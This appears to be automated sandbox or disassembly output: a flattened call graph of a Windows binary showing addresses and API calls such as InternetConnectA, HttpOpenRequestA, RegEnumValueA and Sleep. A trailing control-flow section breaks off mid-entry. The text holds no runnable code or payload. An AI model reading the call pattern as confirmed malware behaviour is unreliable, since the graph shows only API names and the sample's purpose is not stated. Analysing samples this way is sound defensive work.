RtlAllocateHeap 13209->13211 13217 f2017 shared_ptr 13210->13217 13212 f1f82 13211->13212 13213 e5c10 6 API calls 13212->13213 13214 f1f89 13213->13214 13215 f7a00 RtlAllocateHeap 13214->13215 13216 f1f9f 13215->13216 13219 f7a00 RtlAllocateHeap 13216->13219 13218 f2131 13217->13218 13220 f20af 13217->13220 13221 f2ec5 13217->13221 13251 f2a26 shared_ptr 13217->13251 13222 f7a00 RtlAllocateHeap 13218->13222 13223 f1fb7 13219->13223 13224 f80c0 RtlAllocateHeap 13220->13224 13225 f8200 RtlAllocateHeap 13221->13225 13226 f2140 13222->13226 13228 f7a00 RtlAllocateHeap 13223->13228 13235 f20d3 shared_ptr 13224->13235 13229 f2eca 13225->13229 13227 e5c10 6 API calls 13226->13227 13237 f214b 13227->13237 13309 f1fcf 13228->13309 13231 f8200 RtlAllocateHeap 13229->13231 13230 fc199 std::_Xinvalid_argument RtlAllocateHeap 13232 f2ef2 13230->13232 13239 f2ecf 13231->13239 13236 fc1d9 RtlAllocateHeap 13232->13236 13233 f80c0 RtlAllocateHeap 13233->13218 13234 f7a00 RtlAllocateHeap 13238 f2bec 13234->13238 13235->13233 13235->13251 13237->13229 13240 f21a2 13237->13240 13241 ee530 13 API calls 13238->13241 13243 fc199 std::_Xinvalid_argument RtlAllocateHeap 13239->13243 13242 f80c0 RtlAllocateHeap 13240->13242 13241->13251 13244 f21c7 shared_ptr 13242->13244 13243->13251 13244->13239 13245 f7a00 RtlAllocateHeap 13244->13245 13246 f2232 13245->13246 13247 e5c10 6 API calls 13246->13247 13248 f223d 13247->13248 13249 f80c0 RtlAllocateHeap 13248->13249 13252 f22a4 shared_ptr __dosmaperr 13249->13252 13250 f2ea0 shared_ptr __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 13250->13119 13251->13230 13251->13250 13252->13239 13253 118ab6 5 API calls 13252->13253 13254 f2355 13253->13254 13254->13239 13255 f2364 13254->13255 13255->13232 13257 f237d 13255->13257 13258 f265b 13255->13258 13259 f24aa 13255->13259 13260 f25a7 13255->13260 13307 f23d2 shared_ptr 13255->13307 13256 f7a00 RtlAllocateHeap 13264 f2730 13256->13264 13265 f7a00 RtlAllocateHeap 13257->13265 13262 f7a00 RtlAllocateHeap 13258->13262 13261 f7a00 RtlAllocateHeap 13259->13261 13263 f7a00 RtlAllocateHeap 13260->13263 13266 f24c1 13261->13266 13267 f2672 13262->13267 13268 f25be 13263->13268 13269 f7a00 RtlAllocateHeap 13264->13269 13270 f2394 13265->13270 13271 f7a00 RtlAllocateHeap 13266->13271 13272 f7a00 RtlAllocateHeap 13267->13272 13273 f7a00 RtlAllocateHeap 13268->13273 13274 f2742 13269->13274 13275 f7a00 RtlAllocateHeap 13270->13275 13277 f24d9 13271->13277 13278 f268a 13272->13278 13279 f25d6 13273->13279 13545 116729 13274->13545 13276 f23ac 13275->13276 13280 f7a00 RtlAllocateHeap 13276->13280 13281 f7a00 RtlAllocateHeap 13277->13281 13282 f7a00 RtlAllocateHeap 13278->13282 13283 f7a00 RtlAllocateHeap 13279->13283 13284 f23c4 13280->13284 13296 f24f1 13281->13296 13285 f26a2 13282->13285 13286 f25ee 13283->13286 13716 e8d30 13284->13716 13736 e8eb0 13285->13736 13726 e9030 13286->13726 13292 f2b73 13294 f7a00 RtlAllocateHeap 13292->13294 13297 f2b8d 13294->13297 13295 f277b 13298 f7a00 RtlAllocateHeap 13295->13298 13299 f80c0 RtlAllocateHeap 13296->13299 13300 e5c10 6 API calls 13297->13300 13306 f2790 shared_ptr __dosmaperr 13298->13306 13299->13307 13301 f2b94 13300->13301 13302 f7a00 RtlAllocateHeap 13301->13302 13303 f2baa 13302->13303 13304 f7a00 RtlAllocateHeap 13303->13304 13305 f2bc2 13304->13305 13308 f7a00 RtlAllocateHeap 13305->13308 13306->13251 13310 118ab6 5 API calls 13306->13310 13307->13251 13307->13256 13308->13309 13309->13234 13311 f2849 13310->13311 13311->13232 13311->13251 13311->13292 13312 f2871 13311->13312 13313 f7a00 RtlAllocateHeap 13312->13313 13314 f2888 13313->13314 13315 f7a00 RtlAllocateHeap 13314->13315 13316 f289d 13315->13316 13552 e77b0 13316->13552 13318 f28a6 13319 f2b16 13318->13319 13320 f28c1 13318->13320 13321 f7a00 RtlAllocateHeap 13319->13321 13322 f7a00 RtlAllocateHeap 13320->13322 13323 f2b20 13321->13323 13324 f28cb 13322->13324 13325 e5c10 6 API calls 13323->13325 13326 e5c10 6 API calls 13324->13326 13327 f2b27 13325->13327 13328 f28d2 13326->13328 13329 f7a00 RtlAllocateHeap 13327->13329 13330 f7a00 RtlAllocateHeap 13328->13330 13331 f2b3d 13329->13331 13332 f28e8 13330->13332 13334 f7a00 RtlAllocateHeap 13331->13334 13333 f7a00 RtlAllocateHeap 13332->13333 13335 f2900 13333->13335 13336 f2b55 13334->13336 13337 f7a00 RtlAllocateHeap 13335->13337 13338 f7a00 RtlAllocateHeap 13336->13338 13339 f2918 13337->13339 13338->13309 13340 f7a00 RtlAllocateHeap 13339->13340 13341 f292a 13340->13341 13565 ee530 13341->13565 13343 f2933 13343->13251 13344 f7a00 RtlAllocateHeap 13343->13344 13345 f2994 13344->13345 13346 e5c10 6 API calls 13345->13346 13347 f299f 13346->13347 13348 f8320 RtlAllocateHeap 13347->13348 13349 f29b3 13348->13349 13686 f85e0 13349->13686 13351 f29c7 13352 f8320 RtlAllocateHeap 13351->13352 13353 f29d7 13352->13353 13354 f7a00 RtlAllocateHeap 13353->13354 13355 f29f7 13354->13355 13690 e8980 13355->13690 13357 f29fe 13358 f7a00 RtlAllocateHeap 13357->13358 13359 f2a13 13358->13359 13360 e5c10 6 API calls 13359->13360 13361 f2a1a 13360->13361 13698 e5ee0 13361->13698 13365 eaec0 13363->13365 13364 eaee6 shared_ptr __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 13364->13135 13365->13364 13366 e45b0 RtlAllocateHeap 13365->13366 13367 eafab __cftof 13366->13367 13832 e55f0 13367->13832 13369 eb04e 13370 f80c0 RtlAllocateHeap 13369->13370 13371 eb08b 13370->13371 13372 f8200 RtlAllocateHeap 13371->13372 13373 eb18c 13372->13373 13375 f2fb5 13374->13375 13376 f2f54 13374->13376 13377 f7a00 RtlAllocateHeap 13375->13377 13378 f7a00 RtlAllocateHeap 13376->13378 13379 f2fc1 13377->13379 13380 f2f68 13378->13380 13382 e5c10 6 API calls 13379->13382 13381 e5c10 6 API calls 13380->13381 13383 f2f6f 13381->13383 13384 f2fcc 13382->13384 13385 f7a00 RtlAllocateHeap 13383->13385 13386 f80c0 RtlAllocateHeap 13384->13386 13387 f2f82 13385->13387 13390 f300f 13386->13390 13388 f7a00 RtlAllocateHeap 13387->13388 13389 f2f97 13388->13389 13391 f7a00 RtlAllocateHeap 13389->13391 13393 f7a00 RtlAllocateHeap 13390->13393 13401 f30af shared_ptr 13390->13401 13392 f2fac 13391->13392 13395 f7a00 RtlAllocateHeap 13392->13395 13394 f305e 13393->13394 13396 e5c10 6 API calls 13394->13396 13397 f350a 13395->13397 13398 f3066 13396->13398 13399 ee530 13 API calls 13397->13399 13400 f80c0 RtlAllocateHeap 13398->13400 13407 f3513 shared_ptr 13399->13407 13400->13401 13402 f7a00 RtlAllocateHeap 13401->13402 13401->13407 13425 f324c shared_ptr __cftof 13401->13425 13404 f3230 13402->13404 13403 f7a00 RtlAllocateHeap 13403->13425 13405 e5c10 6 API calls 13404->13405 13406 f323b 13405->13406 13408 f8320 RtlAllocateHeap 13406->13408 13409 f80c0 RtlAllocateHeap 13407->13409 13465 f360a shared_ptr __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 13407->13465 13408->13425 13410 f36b0 13409->13410 13411 f4327 13410->13411 13413 f80c0 RtlAllocateHeap 13410->13413 13412 f8200 RtlAllocateHeap 13411->13412 13414 f432c 13412->13414 13415 f36ff 13413->13415 13416 f8200 RtlAllocateHeap 13414->13416 13415->13411 13417 f80c0 RtlAllocateHeap 13415->13417 13422 f4331 13416->13422 13418 f3743 13417->13418 13418->13411 13419 f3765 13418->13419 13423 f80c0 RtlAllocateHeap 13419->13423 13420 f33ce InternetCloseHandle InternetCloseHandle 13420->13425 13421 f33e2 InternetCloseHandle InternetCloseHandle 13421->13425 13427 f8200 RtlAllocateHeap 13422->13427 13424 f3785 13423->13424 13428 f7a00 RtlAllocateHeap 13424->13428 13425->13403 13425->13407 13425->13420 13425->13421 13426 f349d 13425->13426 13433 f343c 13425->13433 13430 f7a00 RtlAllocateHeap 13426->13430 13436 f4340 13427->13436 13429 f3798 13428->13429 13431 e5c10 6 API calls 13429->13431 13432 f34b4 13430->13432 13442 f37a3 13431->13442 13434 e5c10 6 API calls 13432->13434 13435 f7a00 RtlAllocateHeap 13433->13435 13437 f34bb 13434->13437 13438 f3453 13435->13438 13441 fc199 std::_Xinvalid_argument RtlAllocateHeap 13436->13441 13439 f7a00 RtlAllocateHeap 13437->13439 13440 e5c10 6 API calls 13438->13440 13443 f34ce 13439->13443 13444 f345a 13440->13444 13464 f3c82 shared_ptr 13441->13464 13442->13414 13445 f37ef 13442->13445 13446 f7a00 RtlAllocateHeap 13443->13446 13447 f7a00 RtlAllocateHeap 13444->13447 13448 f80c0 RtlAllocateHeap 13445->13448 13449 f34e3 13446->13449 13450 f346d 13447->13450 13458 f3811 shared_ptr 13448->13458 13451 f7a00 RtlAllocateHeap 13449->13451 13452 f7a00 RtlAllocateHeap 13450->13452 13451->13392 13455 f3482 13452->13455 13453 fc1d9 RtlAllocateHeap 13453->13465 13454 e98f0 6 API calls 13456 f3872 13454->13456 13457 f7a00 RtlAllocateHeap 13455->13457 13459 f7a00 RtlAllocateHeap 13456->13459 13456->13464 13457->13392 13458->13422 13458->13454 13460 f3889 13459->13460 13461 e5c10 6 API calls 13460->13461 13462 f3894 13461->13462 13463 f80c0 RtlAllocateHeap 13462->13463 13466 f38dc shared_ptr 13463->13466 13464->13453 13464->13465 13465->13119 13466->13422 13467 f39bd 13466->13467 13520 f3ab7 shared_ptr __dosmaperr 13466->13520 13468 f80c0 RtlAllocateHeap 13467->13468 13470 f39da 13468->13470 13469 118ab6 5 API calls 13471 f3b7a 13469->13471 13472 ead70 6 API calls 13470->13472 13471->13436 13473 f3b89 13471->13473 13480 f39e5 shared_ptr 13472->13480 13473->13464 13474 f3c8d 13473->13474 13475 f3e74 13473->13475 13476 f3ba2 13473->13476 13477 f3f42 13473->13477 13483 f80c0 RtlAllocateHeap 13474->13483 13481 f80c0 RtlAllocateHeap 13475->13481 13479 f80c0 RtlAllocateHeap 13476->13479 13484 f7a00 RtlAllocateHeap 13477->13484 13478 f7a00 RtlAllocateHeap 13482 f3a96 13478->13482 13487 f3bca 13479->13487 13480->13436 13480->13478 13488 f3e9c 13481->13488 13489 f7a00 RtlAllocateHeap 13482->13489 13485 f3cb5 13483->13485 13486 f3f56 13484->13486 13490 f7a00 RtlAllocateHeap 13485->13490 13491 f7a00 RtlAllocateHeap 13486->13491 13492 f7a00 RtlAllocateHeap 13487->13492 13493 f7a00 RtlAllocateHeap 13488->13493 13494 f3aa8 13489->13494 13495 f3cd3 13490->13495 13496 f3f6e 13491->13496 13497 f3be8 13492->13497 13498 f3eba 13493->13498 13499 e49a0 RtlAllocateHeap 13494->13499 13500 e5c10 6 API calls 13495->13500 13501 f7a00 RtlAllocateHeap 13496->13501 13502 e5c10 6 API calls 13497->13502 13503 e5c10 6 API calls 13498->13503 13499->13520 13504 f3cda 13500->13504 13505 f3f86 13501->13505 13506 f3bef 13502->13506 13507 f3ec1 13503->13507 13508 f7a00 RtlAllocateHeap 13504->13508 13509 f7a00 RtlAllocateHeap 13505->13509 13510 f7a00 RtlAllocateHeap 13506->13510 13511 f7a00 RtlAllocateHeap 13507->13511 13512 f3cef 13508->13512 13513 f3f98 13509->13513 13514 f3c07 13510->13514 13515 f3ed9 13511->13515 13516 f7a00 RtlAllocateHeap 13512->13516 13517 f2f10 15 API calls 13513->13517 13518 f7a00 RtlAllocateHeap 13514->13518 13519 f7a00 RtlAllocateHeap 13515->13519 13521 f3d07 13516->13521 13517->13464 13522 f3c1f 13518->13522 13523 f3ef1 13519->13523 13520->13436 13520->13469 13524 f7a00 RtlAllocateHeap 13521->13524 13525 f7a00 RtlAllocateHeap 13522->13525 13526 f7a00 RtlAllocateHeap 13523->13526 13527 f3d1f 13524->13527 13528 f3c37 13525->13528 13529 f3f09 13526->13529 13530 f7a00 RtlAllocateHeap 13527->13530 13531 f7a00 RtlAllocateHeap 13528->13531 13532 f7a00 RtlAllocateHeap 13529->13532 13533 f3d37 13530->13533 13534 f3c4f 13531->13534 13535 f3f21 13532->13535 13536 f7a00 RtlAllocateHeap 13533->13536 13537 f7a00 RtlAllocateHeap 13534->13537 13538 f7a00 RtlAllocateHeap 13535->13538 13539 f3d49 13536->13539 13540 f3c67 13537->13540 13538->13540 13541 f1ec0 15 API calls 13539->13541 13542 f7a00 RtlAllocateHeap 13540->13542 13541->13464 13543 f3c79 13542->13543 13544 f08e0 RtlAllocateHeap 13543->13544 13544->13464 13746 116672 13545->13746 13547 f276a 13547->13292 13548 1167b7 13547->13548 13549 1167c3 __fassign 13548->13549 13551 1167cd __cftof __dosmaperr 13549->13551 13762 116740 13549->13762 13551->13295 13785 f8680 13552->13785 13554 e77f1 13555 f8320 RtlAllocateHeap 13554->13555 13557 e7803 shared_ptr 13555->13557 13556 f7a00 RtlAllocateHeap 13558 e7861 13556->13558 13557->13556 13564 e78a6 shared_ptr __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 13557->13564 13559 f7a00 RtlAllocateHeap 13558->13559 13560 e787c 13559->13560 13561 e5c10 6 API calls 13560->13561 13562 e7883 13561->13562 13563 f80c0 RtlAllocateHeap 13562->13563 13563->13564 13564->13318 13566 f7a00 RtlAllocateHeap 13565->13566 13567 ee576 13566->13567 13568 e5c10 6 API calls 13567->13568 13569 ee581 13568->13569 13570 f7a00 RtlAllocateHeap 13569->13570 13571 ee59c 13570->13571 13572 e5c10 6 API calls 13571->13572 13573 ee5a7 13572->13573 13574 f9280 RtlAllocateHeap 13573->13574 13575 ee5ba 13574->13575 13576 f8320 RtlAllocateHeap 13575->13576 13577 ee5fc 13576->13577 13578 f8220 RtlAllocateHeap 13577->13578 13579 ee60d 13578->13579 13580 f8320 RtlAllocateHeap 13579->13580 13581 ee61e 13580->13581 13582 f7a00 RtlAllocateHeap 13581->13582 13583 ee7cb 13582->13583 13584 f7a00 RtlAllocateHeap 13583->13584 13585 ee7e0 13584->13585 13586 f7a00 RtlAllocateHeap 13585->13586 13587 ee7f2 13586->13587 13588 ebe30 12 API calls 13587->13588 13589 ee7fe 13588->13589 13590 f7a00 RtlAllocateHeap 13589->13590 13591 ee813 13590->13591 13592 f7a00 RtlAllocateHeap 13591->13592 13593 ee82b 13592->13593 13594 e5c10 6 API calls 13593->13594 13595 ee832 13594->13595 13596 e8580 RtlAllocateHeap 13595->13596 13598 ee83e 13596->13598 13597 eea8f shared_ptr __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 13597->13343 13598->13597 13599 f7a00 RtlAllocateHeap 13598->13599 13600 eeb19 13599->13600 13601 e5c10 6 API calls 13600->13601 13602 eeb21 13601->13602 13794 f83c0 13602->13794 13604 eeb36 13605 f8220 RtlAllocateHeap 13604->13605 13606 eeb45 13605->13606 13607 f7a00 RtlAllocateHeap 13606->13607 13608 eed60 13607->13608 13609 e5c10 6 API calls 13608->13609 13610 eed68 13609->13610 13611 f83c0 RtlAllocateHeap 13610->13611 13612 eed7d 13611->13612 13613 f8220 RtlAllocateHeap 13612->13613 13616 eed8c 13613->13616 13614 ef699 shared_ptr 13614->13343 13615 f80c0 RtlAllocateHeap 13615->13616 13616->13614 13616->13615 13617 ef6cb 13616->13617 13618 f7a00 RtlAllocateHeap 13617->13618 13619 ef727 13618->13619 13620 e5c10 6 API calls 13619->13620 13621 ef72e 13620->13621 13622 f7a00 RtlAllocateHeap 13621->13622 13623 ef741 13622->13623 13624 f7a00 RtlAllocateHeap 13623->13624 13625 ef756 13624->13625 13626 f7a00 RtlAllocateHeap 13625->13626 13627 ef76b 13626->13627 13628 f7a00 RtlAllocateHeap 13627->13628 13629 ef77d 13628->13629 13630 ee530 13 API calls 13629->13630 13631 ef786 13630->13631 13632 f80c0 RtlAllocateHeap 13631->13632 13633 ef7aa 13632->13633 13634 f7a00 RtlAllocateHeap 13633->13634 13635 ef7ba 13634->13635 13636 f80c0 RtlAllocateHeap 13635->13636 13637 ef7d7 13636->13637 13638 f80c0 RtlAllocateHeap 13637->13638 13640 ef7f0 13638->13640 13639 ef982 shared_ptr __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 13639->13343 13640->13639 13641 f7a00 RtlAllocateHeap 13640->13641 13642 efa04 13641->13642 13643 e5c10 6 API calls 13642->13643 13644 efa0b 13643->13644 13645 f7a00 RtlAllocateHeap 13644->13645 13646 efa1e 13645->13646 13647 f7a00 RtlAllocateHeap 13646->13647 13648 efa33 13647->13648 13649 f7a00 RtlAllocateHeap 13648->13649 13650 efa48 13649->13650 13651 f7a00 RtlAllocateHeap 13650->13651 13652 efa5a 13651->13652 13653 ee530 13 API calls 13652->13653 13655 efa63 13653->13655 13654 efb35 shared_ptr 13654->13343 13655->13654 13656 f7a00 RtlAllocateHeap 13655->13656 13657 efba5 13656->13657 13802 e9580 13657->13802 13659 efbb4 13817 e9230 13659->13817 13661 efbc3 13662 f8320 RtlAllocateHeap 13661->13662 13663 efbdb 13662->13663 13663->13663 13664 f80c0 RtlAllocateHeap 13663->13664 13665 efc8c 13664->13665 13666 f7a00 RtlAllocateHeap 13665->13666 13667 efca7 13666->13667 13668 f7a00 RtlAllocateHeap 13667->13668 13669 efcb9 13668->13669 13670 116729 RtlAllocateHeap 13669->13670 13671 efce1 13670->13671 13672 f7a00 RtlAllocateHeap 13671->13672 13673 f05d4 13672->13673 13674 e5c10 6 API calls 13673->13674 13675 f05db 13674->13675 13676 f7a00 RtlAllocateHeap 13675->13676 13677 f05f1 13676->13677 13678 f7a00 RtlAllocateHeap 13677->13678 13679 f0609 13678->13679 13680 f7a00 RtlAllocateHeap 13679->13680 13681 f0621 13680->13681 13682 f7a00 RtlAllocateHeap 13681->13682 13683 f0633 13682->13683 13684 ee530 13 API calls 13683->13684 13685 f063c shared_ptr __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 13684->13685 13685->13343 13687 f85f6 13686->13687 13687->13687 13688 f8f40 RtlAllocateHeap 13687->13688 13689 f860b 13687->13689 13688->13689 13689->13351 13691 e8aea 13690->13691 13697 e89d8 shared_ptr 13690->13697 13691->13357 13692 f7a00 RtlAllocateHeap 13692->13697 13693 e5c10 6 API calls 13693->13697 13694 e8b20 13696 f8200 RtlAllocateHeap 13694->13696 13695 f80c0 RtlAllocateHeap 13695->13697 13696->13691 13697->13691 13697->13692 13697->13693 13697->13694 13697->13695 13700 e5f18 13698->13700 13699 e5ffe shared_ptr __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 13699->13251 13700->13699 13701 f80c0 RtlAllocateHeap 13700->13701 13702 e6089 13701->13702 13703 f80c0 RtlAllocateHeap 13702->13703 13704 e60bd 13703->13704 13705 f80c0 RtlAllocateHeap 13704->13705 13706 e60ee 13705->13706 13707 f80c0 RtlAllocateHeap 13706->13707 13708 e611f 13707->13708 13709 f80c0 RtlAllocateHeap 13708->13709 13710 e6150 RegOpenKeyExA 13709->13710 13712 e6493 shared_ptr __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 13710->13712 13715 e61a3 __cftof 13710->13715 13711 e6243 RegEnumValueA 13711->13715 13712->13251 13713 f80c0 RtlAllocateHeap 13713->13715 13714 f7a00 RtlAllocateHeap 13714->13715 13715->13711 13715->13712 13715->13713 13715->13714 13717 e8d80 13716->13717 13718 f7a00 RtlAllocateHeap 13717->13718 13719 e8d8f 13718->13719 13720 e5c10 6 API calls 13719->13720 13721 e8d9a 13720->13721 13722 f80c0 RtlAllocateHeap 13721->13722 13723 e8dec 13722->13723 13724 f8220 RtlAllocateHeap 13723->13724 13725 e8dfe shared_ptr __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 13724->13725 13725->13307 13727 e907f 13726->13727 13728 f7a00 RtlAllocateHeap 13727->13728 13729 e908f 13728->13729 13730 e5c10 6 API calls 13729->13730 13731 e909a 13730->13731 13732 f80c0 RtlAllocateHeap 13731->13732 13733 e90ec 13732->13733 13734 f8220 RtlAllocateHeap 13733->13734 13735 e90fe shared_ptr __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 13734->13735 13735->13307 13737 e8eff 13736->13737 13738 f7a00 RtlAllocateHeap 13737->13738 13739 e8f0f 13738->13739 13740 e5c10 6 API calls 13739->13740 13741 e8f1a 13740->13741 13742 f80c0 RtlAllocateHeap 13741->13742 13743 e8f6c 13742->13743 13744 f8220 RtlAllocateHeap 13743->13744 13745 e8f7e shared_ptr __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 13744->13745 13745->13307 13747 11667e __fassign 13746->13747 13749 116685 __cftof __dosmaperr 13747->13749 13750 11a8c3 13747->13750 13749->13547 13751 11a8cf __fassign 13750->13751 13754 11a967 13751->13754 13753 11a8ea 13753->13749 13756 11a98a 13754->13756 13757 11a9d0 ___free_lconv_mon 13756->13757 13758 11d82f 13756->13758 13757->13753 13761 11d83c __fassign 13758->13761 13759 11d867 RtlAllocateHeap 13760 11d87a __dosmaperr 13759->13760 13759->13761 13760->13757 13761->13759 13761->13760 13763 116762 13762->13763 13765 11674d __cftof __dosmaperr ___free_lconv_mon 13762->13765 13763->13765 13766 11a038 13763->13766 13765->13551 13767 11a075 13766->13767 13768 11a050 13766->13768 13767->13765 13768->13767 13770 120439 13768->13770 13771 120445 __fassign 13770->13771 13773 12044d __cftof __dosmaperr 13771->13773 13774 12052b 13771->13774 13773->13767 13775 12054d 13774->13775 13777 120551 __cftof __dosmaperr 13774->13777 13775->13777 13778 11fcc0 13775->13778 13777->13773 13779 11fd0d 13778->13779 13780 11690a __fassign 5 API calls 13779->13780 13783 11fd1c __cftof 13780->13783 13781 11b67d GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 13781->13783 13782 11ffbc __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 13782->13777 13783->13781 13783->13782 13784 11c719 5 API calls __fassign 13783->13784 13784->13783 13786 f86e0 13785->13786 13786->13786 13787 f7760 RtlAllocateHeap 13786->13787 13788 f86f9 13787->13788 13789 f8f40 RtlAllocateHeap 13788->13789 13790 f8714 13788->13790 13789->13790 13791 f8f40 RtlAllocateHeap 13790->13791 13793 f8769 13790->13793 13792 f87b1 13791->13792 13792->13554 13793->13554 13795 f7760 RtlAllocateHeap 13794->13795 13796 f8439 13795->13796 13797 f8f40 RtlAllocateHeap 13796->13797 13798 f8454 13796->13798 13797->13798 13799 f8f40 RtlAllocateHeap 13798->13799 13801 f84a8 13798->13801 13800 f84ee 13799->13800 13800->13604 13801->13604 13803 e95d4 13802->13803 13804 f80c0 RtlAllocateHeap 13803->13804 13805 e961c 13804->13805 13806 f7a00 RtlAllocateHeap 13805->13806 13816 e9635 shared_ptr 13806->13816 13807 e979f 13809 e97fe 13807->13809 13810 e98e0 13807->13810 13808 f7a00 RtlAllocateHeap 13808->13816 13811 f80c0 RtlAllocateHeap 13809->13811 13812 f8200 RtlAllocateHeap 13810->13812 13814 e9834 shared_ptr __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 13811->13814 13812->13814 13813 e5c10 6 API calls 13813->13816 13814->13659 13815 f80c0 RtlAllocateHeap 13815->13816 13816->13807 13816->13808 13816->13810 13816->13813 13816->13814 13816->13815 13818 e9284 13817->13818 13819 f80c0 RtlAllocateHeap 13818->13819 13820 e92cc 13819->13820 13821 f7a00 RtlAllocateHeap 13820->13821 13831 e92e5 shared_ptr 13821->13831 13822 e944f 13824 f80c0 RtlAllocateHeap 13822->13824 13823 f7a00 RtlAllocateHeap 13823->13831 13827 e94c6 shared_ptr 13824->13827 13825 e5c10 6 API calls 13825->13831 13826 e9543 shared_ptr __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 13826->13661 13827->13826 13829 f8200 RtlAllocateHeap 13827->13829 13828 f80c0 RtlAllocateHeap 13828->13831 13830 e9578 13829->13830 13831->13822 13831->13823 13831->13825 13831->13827 13831->13828 13833 e5610 13832->13833 13833->13833 13835 e5710 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 13833->13835 13836 e22c0 13833->13836 13835->13369 13839 e2280 13836->13839 13840 e2296 13839->13840 13843 1187f8 13840->13843 13846 117609 13843->13846 13845 e22a4 13845->13833 13847 117649 13846->13847 13851 117631 __cftof __dosmaperr __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 13846->13851 13848 11690a __fassign 5 API calls 13847->13848 13847->13851 13849 117661 13848->13849 13852 117bc4 13849->13852 13851->13845 13854 117bd5 13852->13854 13853 117be4 __cftof __dosmaperr 13853->13851 13854->13853 13855 118168 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap RtlAllocateHeap 13854->13855 13856 117dc2 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap RtlAllocateHeap 13854->13856 13857 117de8 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap RtlAllocateHeap 13854->13857 13858 117f36 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap RtlAllocateHeap 13854->13858 13855->13854 13856->13854 13857->13854 13858->13854 13860 118868 5 API calls 13859->13860 13861 118bdc 13860->13861 13861->12986 13863 f80c0 RtlAllocateHeap 13862->13863 13870 e4707 shared_ptr 13863->13870 13864 e4976 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 13864->13084 13865 f80c0 RtlAllocateHeap 13869 e4846 shared_ptr 13865->13869 13866 f80c0 RtlAllocateHeap 13866->13870 13867 f8f40 RtlAllocateHeap 13867->13869 13868 f8f40 RtlAllocateHeap 13868->13870 13869->13864 13869->13865 13869->13867 13871 e4994 13869->13871 13870->13866 13870->13868 13870->13869 13870->13871 13872 f80c0 RtlAllocateHeap 13871->13872 13873 e49f3 13872->13873 13874 f80c0 RtlAllocateHeap 13873->13874 13875 e4a0c 13874->13875 13876 e4690 RtlAllocateHeap 13875->13876 13877 e4a99 shared_ptr 13876->13877 13877->13084 13960 f87d0 13961 fd3e2 RtlAllocateHeap 13960->13961 13962 f882a __cftof 13961->13962 13970 f9bb0 13962->13970 13964 f8854 13967 f886c __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 13964->13967 13974 e43f0 13964->13974 13969 f88df 13971 f9be5 13970->13971 13983 e2ce0 13971->13983 13973 f9c16 13973->13964 13975 fbedf InitOnceExecuteOnce 13974->13975 13976 e440a 13975->13976 13977 e4411 13976->13977 13978 116cbb 4 API calls 13976->13978 13980 fbe50 13977->13980 13979 e4424 13978->13979 14027 fbd8b 13980->14027 13982 fbe66 std::_Throw_future_error 13982->13969 13984 e2d1d 13983->13984 13985 fbedf InitOnceExecuteOnce 13984->13985 13986 e2d46 13985->13986 13987 e2d51 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 13986->13987 13988 e2d88 13986->13988 13992 fbef7 13986->13992 13987->13973 14001 e2440 13988->14001 13993 fbf03 13992->13993 14004 e2900 13993->14004 13995 fbf23 std::_Throw_future_error 13996 fbf6a 13995->13996 13997 fbf73 13995->13997 14012 fbe7f 13996->14012 13999 e2ae0 5 API calls 13997->13999 14000 fbf6f 13999->14000 14000->13988 14022 fb5d6 14001->14022 14003 e2472 14005 f80c0 RtlAllocateHeap 14004->14005 14006 e294f 14005->14006 14007 e26b0 RtlAllocateHeap 14006->14007 14009 e2967 14007->14009 14008 e298d shared_ptr 14008->13995 14009->14008 14010 1138af ___std_exception_copy RtlAllocateHeap 14009->14010 14011 e29e4 14010->14011 14011->13995 14013 fcc31 InitOnceExecuteOnce 14012->14013 14014 fbe97 14013->14014 14015 fbe9e 14014->14015 14018 116cbb 14014->14018 14015->14000 14019 116cc7 __fassign 14018->14019 14020 118bec __fassign 4 API calls 14019->14020 14021 116cf6 14020->14021 14023 fb5f1 std::_Throw_future_error 14022->14023 14024 fb658 __fassign __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 14023->14024 14025 118bec __fassign 4 API calls 14023->14025 14024->14003 14026 fb69f 14025->14026 14028 e22e0 std::future_error::future_error RtlAllocateHeap 14027->14028 14029 fbd9f 14028->14029 14029->13982

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1446 ebe30-ebe7c 1447 ebe82-ebe86 1446->1447 1448 ec281-ec2a6 call f80c0 1446->1448 1447->1448 1449 ebe8c-ebe90 1447->1449 1453 ec2a8-ec2b4 1448->1453 1454 ec2d4-ec2ec 1448->1454 1449->1448 1451 ebe96-ebf2a Sleep InternetOpenW InternetConnectA call f7a00 call e5c10 1449->1451 1480 ebf2e-ebf4a HttpOpenRequestA 1451->1480 1481 ebf2c 1451->1481 1456 ec2ca-ec2d1 call fd663 1453->1456 1457 ec2b6-ec2c4 1453->1457 1458 ec238-ec250 1454->1458 1459 ec2f2-ec2fe 1454->1459 1456->1454 1457->1456 1461 ec34f-ec354 call 116c6a 1457->1461 1465 ec256-ec262 1458->1465 1466 ec323-ec33f call fcff1 1458->1466 1463 ec22e-ec235 call fd663 1459->1463 1464 ec304-ec312 1459->1464 1463->1458 1464->1461 1471 ec314 1464->1471 1472 ec268-ec276 1465->1472 1473 ec319-ec320 call fd663 1465->1473 1471->1463 1472->1461 1479 ec27c 1472->1479 1473->1466 1479->1473 1484 ebf4c-ebf5b 1480->1484 1485 